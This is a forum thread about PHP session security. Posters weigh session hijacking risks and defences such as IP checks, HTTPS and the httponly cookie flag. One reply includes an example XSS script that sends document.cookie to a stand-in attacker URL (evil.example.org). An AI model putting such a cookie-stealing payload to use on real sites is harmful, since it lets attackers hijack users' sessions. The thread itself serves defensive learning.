Hi all,

I'm just wondering how can you hack a simple session like this.
login.php
assuming that if they login in successfully, then
$_SESSION['LetMeIn!'] = "youAreIn!";

profile.php
<?php
session_start();

if($_SESSION['LetMeIn!'] != "youAreIn!"){
echo 'You need to log in!';
}else{
echo 'You are granted access!';
}

?>

Assuming the sessions are stored in a secure location on your server (either in a directory or a DB) then it's pretty difficult to spoof it... It is more likely that someone tricks a script into setting the session for them.

session hijacking or fixation is a risk - where, somehow, the session id passed from the server to the browser (typically via cookie, but also sometimes in the GET string) is intercepted and used by a malicious type to pretend to be someone they're not...

a few solutions:


store the remote IP address in the session, and test it on each request throughout the session
change the name of the PHP session id variable used in the cookie/get from the well known default
send the cookie over a secure HTTPS connection - but you'd need an SSL certificate to put users at ease with this option


Shiflett's "Essential PHP Security" from O'Reilly is definitely worth purchasing if you want to learn more about security in PHP

<script>
document.location =
'http://evil.example.org/steal.php?cookies=' +
document.cookie
</script>
If you don't validate your output even something as simple as above can render session security useless.
If that get trough, your sessionid will be passed to hijacker and he can then become you.

As Vege says the real danger is someone injecting something like that into one / all of your pages and then a valid user visits one. Which is as I said, tricking your scripts into revealing the info themselves.

I don't like the IP checking method. Legitimately load balanced proxy services can fall foul of this one, plus if anyone is actually playing maliciously on a local network (e.g. an Internet cafe / Uni network to make grabbing session data trivial) then it is quite likely the IP will be the same...

Iw heard that for example AOL can change IP during session.
We don't do anything IP dependent here at work. Some of our clients use proxys that change IP constantly.

As of PHP 5.2 you can set the httponly flag in the php.ini file

session.cookie_httponly = 1

Which will (should) stop JS abuse of the sort above...

cool! thanks everyone. I will surely go look around for more info

paul and vege do make some good points re: the IP checking - I guess it all comes down to the environment you're working in...

We tend not to use it on public sites - but we do tend use it on closed intranets to prevent any 'funny' stuff on the internal network...

Just don't rely on it...